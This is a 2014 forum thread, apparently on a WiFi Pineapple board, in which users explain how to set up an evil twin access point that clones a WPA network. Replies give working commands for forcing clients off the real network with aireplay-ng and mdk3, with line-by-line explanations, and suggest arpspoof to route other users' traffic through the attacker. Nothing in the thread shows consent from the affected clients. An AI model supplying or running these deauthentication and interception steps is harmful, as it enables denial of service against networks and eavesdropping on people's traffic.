pabo2uk Posted April 30, 2014 Share Posted April 30, 2014 Now im a bit more comfortable with the Pineapple, I thought id explore more creative ways of spoofing APs and devices. I'm quite not sure what kind of attack this is called (I think evil twin attack- I maybe mistaken) but have followed some advice on how to pull off this particular attack. The bottom line is I cannot get it to work would like some guidance please. Essentially I'm trying to spoof a WPA protected AP and get one of its clients connecting to my MKV rather than the AP it think its connected too. So this is what I have done...... PART 1. 1. Log into Pineapple and change the SSID of AP to the target AP in this case Epsilon2, also set passkey of Epsilon2 - which I already know! PART 2 1. SSH into Pineapple 2. airmon-ng start wlan1 3. airodump-ng -c 11 --bssid <00:11:22:33:44:55> wlan1 - LET THIS RUN AND WAIT FOR ANY DEVICE TO CONNECT 4. Once a device has connected i will note the devices MAC address 6. aireplay-ng -0 5 -a <00:11:22:33:44:55> -c <55:44:33:22:11:00> wlan1 - LET THIS RUN 7. I can see that the ACKS are being sent on both the AP and client But it just dosnt work - What am I doing wrong? DO I have set to set the channel on the interface for this to work maybe? Thanks guys Quote Link to comment Share on other sites More sharing options...
3xNiks Posted April 30, 2014 Share Posted April 30, 2014 (edited) I think you need the monitor interface you have enabled with airmon-ng (normally mon0). Try running aireplay-ng and airodump-ng on the monitor interface. Edited April 30, 2014 by 3xNiks Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted April 30, 2014 Share Posted April 30, 2014 As far as I am aware, this is incredibly difficult if not impossible to do. If the ESSID and MAC of the pineapple match that of the AP (including the encryption, of course), then the two access points will both "compete" for the AP and will result in the client not connecting at all. It's a security feature of WPA and WEP that isn't in open networks - which is why Karma only works with open APs. If you know the password, just connect to it in client mode and use arpspoof to route all the other client connections through you. Quote Link to comment Share on other sites More sharing options...
pabo2uk Posted April 30, 2014 Author Share Posted April 30, 2014 Thanks for the response. I can probably get my next question by looking on youtube, but gonna ask anyway...... I have come across arpspoofing before and have ATTEMPTED to play with it using kali Linux...... How would I go about using the commands while SSH'd into the Pineapple?? Infact what are the commands? Is there any good aprspoofing tutorials? Thanks Quote Link to comment Share on other sites More sharing options...
NullNull Posted April 30, 2014 Share Posted April 30, 2014 (edited) As far as I am aware, this is incredibly difficult if not impossible to do. Maybe you are mistaking it with something else Step 1 Configure your AP to have exactly the same SSID ENCRYPTION and PASSKEY as the root AP BUT different channel. The channel of your AP should be at least 3 channels away from the root AP. (e.g if the root AP channel is 11 your's should be maximum 7, i would had set it as 1). Step 2 To deauth clients from the root AP you will need a second wireless card (e.g wlan1) and use aireplay-ng or mdk3 deauth mode. I suggest mdk3. If you do not run any deauth attack use the same channel as the root AP. In this case new clients will connect to AP with better/stronger signal quality/strength and the already connected clients will stay connected to root AP. Run this to install mdk3 opkg update opkg install mdk3 and this to see mdk3 options mdk3 --fullhelp to run the deauth attack with mdk3 run: ifconfig wlan1 down airmon-ng start wlan1 echo {root_ap_bssid} > black.list mdk3 {monitor_int} d -c {root_ap_channel} -b black.list (replace {root_ap_bssid}, {monitor_int} and {root_ap channel}) If you still want to use aireplay-ng and deauth every client from the root AP run: ifconfig wlan1 down iwconfig wlan1 channel {root_ap_channel} airmon-ng start wlan1 aireplay-ng -0 100 -a {root_ap_bssid} {monitor_int} (replace {root_ap_channel}, {root_ap_bssid} and {monitor_int}) Else if you want to deaut only one client run: ifconfig wlan1 down iwconfig wlan1 channel {root_ap_channel} airmon-ng start wlan1 aireplay-ng -0 100 -a {root_ap_bssid} -c {client_bssid} {monitor_int} (replace {root_ap_channel}, {root_ap_bssid}, {client_bssid} and {monitor_int}) Edited April 30, 2014 by KiatoGS Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted May 1, 2014 Share Posted May 1, 2014 Hmm, looks fairly similar to what I've tried in the past. Do you not encounter any clients just dropping off completely? Perhaps I didn't test it throroughyl enough, I apologise if it can indeed be done! Quote Link to comment Share on other sites More sharing options...
pabo2uk Posted May 1, 2014 Author Share Posted May 1, 2014 Thanks for the very informative response - I shall definitely give this a bash and let you know the results. Quick question, please can you explain the difference between mdk3 and aireplay, all I know is that they are deauth tools.... Thanks Quote Link to comment Share on other sites More sharing options...
TYTechnolust Posted May 1, 2014 Share Posted May 1, 2014 (edited) MDK floods packets to the AP, in order to reboot the AP. Aireplay-ng removes clients through de-auth. Edited May 1, 2014 by TYTechnolust Quote Link to comment Share on other sites More sharing options...
pabo2uk Posted May 1, 2014 Author Share Posted May 1, 2014 What do you mean by add clients? Does it just overload it with fake clients causing the AP to crash? Also when you say crash is that just crashing the Wifi part of the router?! By the sound of things (im guessing) mdk3 is a better choice? Sorry for all the annoying questions, im just interested in how it all works..... Thanks Quote Link to comment Share on other sites More sharing options...
TYTechnolust Posted May 1, 2014 Share Posted May 1, 2014 Client traffic actually (packets), to force a denial of service/reboot. MDK3 vs Aireplay-ng......some routers are more immune to one over the other. Quote Link to comment Share on other sites More sharing options...
pabo2uk Posted May 1, 2014 Author Share Posted May 1, 2014 Ahh I see, so while the router is rebooting the Pineapple is quite happily taking on its clients! Clever. Thanks for that Technolust.... Quote Link to comment Share on other sites More sharing options...
pabo2uk Posted May 1, 2014 Author Share Posted May 1, 2014 Thanks for all the support guys..... Just one last question... PROIMISE :) Earlier in this thread kiatoGS kindly put down some mdk3 commands, can you just explain what the commands are doing? echo {root_ap_bssid} > black.list mdk3 {monitor_int} d -c {root_ap_channel} -b black.list Thanks Quote Link to comment Share on other sites More sharing options...
TYTechnolust Posted May 1, 2014 Share Posted May 1, 2014 echo {root_ap_bssid} > black.list = create a file called black.list with the AP bssid mdk3 {monitor_int} d -c {root_ap_channel} -b black.list = Run mdk3 on your monitor interface (mon0) in deauthentication mode (d) on AP channel ( -c 6 ) with the blacklist file you created above (-b) Quote Link to comment Share on other sites More sharing options...
NullNull Posted May 1, 2014 Share Posted May 1, 2014 (edited) Thanks for all the support guys..... Just one last question... PROIMISE :) Earlier in this thread kiatoGS kindly put down some mdk3 commands, can you just explain what the commands are doing? echo {root_ap_bssid} > black.list mdk3 {monitor_int} d -c {root_ap_channel} -b black.list Thanks echo {root_ap_bssid} > black.list = create a file called black.list with the AP bssid mdk3 {monitor_int} d -c {root_ap_channel} -b black.list = Run mdk3 on your monitor interface (mon0) in deauthentication mode (d) on AP channel ( -c 6 ) with the blacklist file you created above (-b) TYTecholust this is correct! I just want to add some details... At the black.list you can add as many APs as you like. The format of the file should be this: root@kiatogs:~# cat black.list CC:1A:FA:9F:3D:14 C1:F4:56:7A:23:35 38:22:FF:A2:65:F1 root@kiatogs:~# If the APs you want to deauth (and their bssids are in the black.list) are on different channels you can use: mdk3 mon0 d -c 1,6,11,13 -b black.list This command will use interface mon0 and the mdk3 will search for the bssids that are in the black.list at the channels 1, 6, 11 and 13. If -c parameter is not declared mdk3 will hop in all channels to find those bssids. You can find out more by typing: mdk3 --fullhelp or: man mdk3 Edited May 1, 2014 by KiatoGS Quote Link to comment Share on other sites More sharing options...
pabo2uk Posted May 1, 2014 Author Share Posted May 1, 2014 Thanks everyone for their input. It is greatly appreciated. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.